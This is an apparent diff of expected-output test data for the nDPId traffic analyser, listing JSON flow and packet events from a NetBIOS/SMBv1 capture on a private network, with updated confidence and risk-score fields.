-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772235481,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1447772235481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1447772235481,"pkt":"\/\/\/\/\/\/\/\/ADBIsLGmCABFAADlboAAAIARrCwKAAVdCgAF\/wCKAIoA0eR9EQ7pCQoABV0AigC7AAAgRUNFUEZIRUpFRkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZHRUpFSEVKRU1FQkVPRkVGUEVIRkNFUEZGRkFDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoAQk9XSUUAAAAAAAAAAAAAAAYBBxABAA8BVaoA"}
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772235481,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772235481,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238479,"flow_last_seen":1447772238479,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772238479,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1447772238479,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772238479,"pkt":"ABzEEHkPAOCBt8asCABFAABOD1sAAIARDUQKAAXpCgAEGACJAIkAOgf\/mi8AAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238479,"flow_last_seen":1447772238479,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772238479,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238479,"flow_last_seen":1447772238479,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772238479,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1447772238479,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1447772238479,"pkt":"AOCBt8asABzEEHkPCABFAADLWT8AAIARwuIKAAQYCgAF6QCJAIkAt\/eSmi+EAAAAAAEAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAEAAAAAAHcER1VOTkFSICAgICAgICAgAAQAVklHSUxBTlRfR1JPVVAgAIQAR1VOTkFSICAgICAgICAgIAQAVklHSUxBTlRfR1JPVVAgHoQAABzEEHkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772238721,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1447772238721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772238721,"pkt":"\/\/\/\/\/\/\/\/EGBLoLzrCABFAABOP6wAAIAR3OYKAAQOCgAF\/wCJAIkAOtzbuxABEAABAAAAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772238721,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772238721,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1447772239929,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772239929,"pkt":"\/\/\/\/\/\/\/\/AOCBdSQGCABFAABOZPwAAIARtz8KAARlCgAF\/wCJAIkAOvRglzYBEAABAAAAAAAAIEVPRkdGQ0RKQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1447772248480,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772248480,"pkt":"ABzEEHkPAOCBt8asCABFAABORZkAAIAR1wUKAAXpCgAEGACJAIkAOgf2mjgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772251795,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1447772251795,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772251795,"pkt":"ABzEEHkPACFislxDCABFAABOJRwAAH8R\/RQKAAFXCgAEGOJBAIkAOqRfIKgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="}
-00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772251795,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772251795,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1447772251795,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1447772251795,"pkt":"ACFislxDABzEEHkPCABFAADLQERAAIARoG8KAAQYCgABVwCJ4kEAt5PzIKiEAAAAAAEAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAEAAAAAAHcER1VOTkFSICAgICAgICAgAAQAVklHSUxBTlRfR1JPVVAgAIQAR1VOTkFSICAgICAgICAgIAQAVklHSUxBTlRfR1JPVVAgHoQAABzEEHkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1447772211392,"flow_last_seen":1447772269350,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2950,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1447772238479,"flow_last_seen":1447772248481,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221882,"flow_last_seen":1447772239929,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":181,"flow_first_seen":1447772210350,"flow_last_seen":1447772269972,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":9050,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00597{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1447772211392,"flow_last_seen":1447772269350,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2950,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
